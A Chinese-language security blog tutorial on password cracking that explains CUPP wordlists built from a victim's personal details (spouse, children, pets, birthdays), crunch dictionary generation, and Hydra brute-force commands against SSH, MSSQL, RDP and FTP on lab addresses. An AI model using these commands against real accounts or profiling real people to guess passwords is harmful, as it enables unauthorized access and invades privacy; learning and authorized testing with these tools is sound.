干货 | 密码破解中CUPP、Crunch、Hydra常用工具使用

2022-03-30 21:39:49 浏览数 (2)

1、免责声明

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途。

2、内容速览

口令破解:

易破解的口令如下:

  • 弱口令:比如12345、00000这种简单的密码
  • 默认口令:服务或者软件自动生成的口令,比如PHPstudy中自动生成MySQL密码为root
  • 明文传输:HTTP、FTP、Telnet等传输协议。

破解:

  • 在线破解:破解过程中账户需要验证
  • 离线破解:密文还原成明文的过程

字典生成工具

字典:
  • 弱口令字典:
  • 社工字典:
社工字典cupp:

cupp是一款基于python编写的可交互性的密码字典生成工具。结合社会工程学,你会获得一份根据个人信息生成的专属字典。

与传统字典相比,其优势在于准确率更高

Kali默认没有安装,使用如下命令安装:

apt-get install cupp

使用方法 cupp -i

即可按照提示步骤生成字典:

之后就会生成成功

这是它的提示:

代码语言:javascript复制
 -i 是按照提示步骤实施
 -w 是引入字典
 -l 是下载网上字典
 -a 是来自数据库直接解析密码
实例演示-生成字典

运行命令"cupp -i",填写受害人姓、名、绰号、生日。**

2.填写受害人配偶的名字、绰号、生日

3.填写孩子的名字、绰号、生日

4.填写宠物的名字以及公司的名字

5.是否添加一些关于受害人的关键词

6.是否在密码结尾添加一些特殊字符

7是否在密码结尾添加一些随机数字

8.填写"y",生成字典,可以在root目录下查看

实例演示-下载字典

1.运行命令 "cupp -l" ,填写你想要下载字典的序号,下载完成的字典保存在"/root/dictionaries/chinese"目录下。

弱口令字典:crunch

kali自带,无需安装。 详细内容见 man crunch

  • 使用方法:crunch <min> <max> [<charset string>] [options]:min和max分别是密码的最小长度和最大长度,后面可以加上字符集和其他选项。
  • 比如crunch 1 8 :输出a~zzzzzzzz所有可能的密码
参数
代码语言:javascript复制
-b 指定文件输出的大小,避免字典文件过大
 -c 指定文件输出的行数,记包含密码的个数
 -d 限制相同元素出现的次数
 -e 定义停止字符,即到该字符串就停止生成
 -f 调用库文件(/usr/share/crunch/charset.lst)
 -i 改变输出格式,即aaa,aab -> aaa,baa
 -o 将密码保存到指定文件
 -q 读取密码文件,即读取pass.txt
 -r 定义重复一个字符串就重新开始
 -s 指定一个开始的字符
 -t 指定密码输出的格式
 -u 禁止打印百分比
 -z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z
 -l 生成特殊字符
 -p 指定生成元素
 •
 特殊字符
 %代表数字
 ^代表特殊符号
 @代表小写字母
 ,代表大写字母
常见用法
生成最小2位,最大4位,不选字符集默认是26个小写字母

crunch 2 4

crunch 1 2 ab

生成最小为1,最大为6.由abc和空格为元素的所有组合(代表空格)

crunch 1 6 abc

调用密码库charset.lst,生成最小为3,最大为3,元素为密码库charset.lst中 mixalpha-numeric-symbol14 的项目,并保存为1.txt;

crunch 3 3 –f /usr/share/crunch/charset.lst mixalpha-numeric-symbol14 >1.txt 注:charset.ls 的目录为 /usr/share/crunch/charset.lst

调用密码库charset.lst,生成8位密码;其中元素为密码库charset.lst中 mixalpha-numeric-symbol14 的项;格式为“两个小写字母 jerry 一个小写字母”。

crunch 8 8 -f charset.lst mixalpha-numeric-symbol14 -t @@jerry@ -s abjerryc >2.txt 注:-t 简单参数详解:%:数字 ^:特殊字符 @:小写字母 ,:大写字母

调用密码库charset.lst,生成2位和3位密码;其中元素为密码库charset.lst中ualpha的项;并且以BB开头

crunch 2 3 -f charset.lst ualpha -s BB

生成最小为1位,最大为5位元素为所有小写字母的密码字典,其中每一个字典文件包含6000个密码,并将密码文件保存为bz2文件,文件名将以 "第一个密码" " - " "最后一个密码" " .txt.bz2 " 保存(比如000-999.txt.bz2)

crunch 1 5 -o START -c 6000 -z bzip2

生成最小为4位,最大为5位元素为所有小写字母的密码字典,并以20M进行分割;这时会生成4个文件:aaaa-gvfed.txt, gvfee-ombqy.txt, ombqz-wcydt.txt, wcydu-zzzzz.txt:其中前三个大概每个20M,最后一个10M左右(因为总共70M)

crunch 4 5 -b 20mib -o START

生成3位密码,其中第一位由“a,b,c”中的一个;第二位为“1,2,3”中的一个;第三位为“!,@,#”中的一个。比如1a! 2a# 3b@ ......

crunch 3 3 abc 123 @#! -t @%^

代码语言:javascript复制
注意:如果使用需要限定字符 则直接加需要限定的字符,
 如果是要限定数字的话 那么必须在限定的 数字 前面加上 " " 。
生成7个元素组成的密码,其中前三个为 a b c任意组合, 第四位为符号,第五位为大写字母,第六位为小写字母,第七位为数字 。比如abc!Aa1 bac!Aa1

crunch 7 7 –t ddd^,@% -p a b c

代码语言:javascript复制
注意:-t 后面的 "d" 是从 -p 里面的字符串随机组合,1个d就代表1位
生成5位密码,格式为三个字母 两个数字,并限制每个密码最少出现2种字母

crunch 5 5 -d 2@ -t @@@%%

调用密码库unicode_test.lst中的the-greeks项目字符,生成4位密码,其中格式为两小写字母 两数字

crunch 4 4 -f unicode_test.lst the-greeks -t @@%% -l @xdd

口令破解工具hydra
代码语言:javascript复制
 -l 指定一个用户名
 -p指定一个密码
 -P指定密码字典
 -L 指定用户名字典
 -vV显示爆破细节
 -o保存爆破结果
 -f找到正确密码就停止爆破
 -e n(null)、s(same)、r(反向)
 -e nsr
 -t 线程
实例:

破解ssh:hydra -l zeker62 -P pwd.dic 192.168.223.133 ssh -vV -f -e nsr

结果,破解成功:

常用命令

破解MSSQL 口令

hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV

破解RDP 口令

hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV

破解FTP 口令

hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.16 8.1.150 ftp -vV

0 人点赞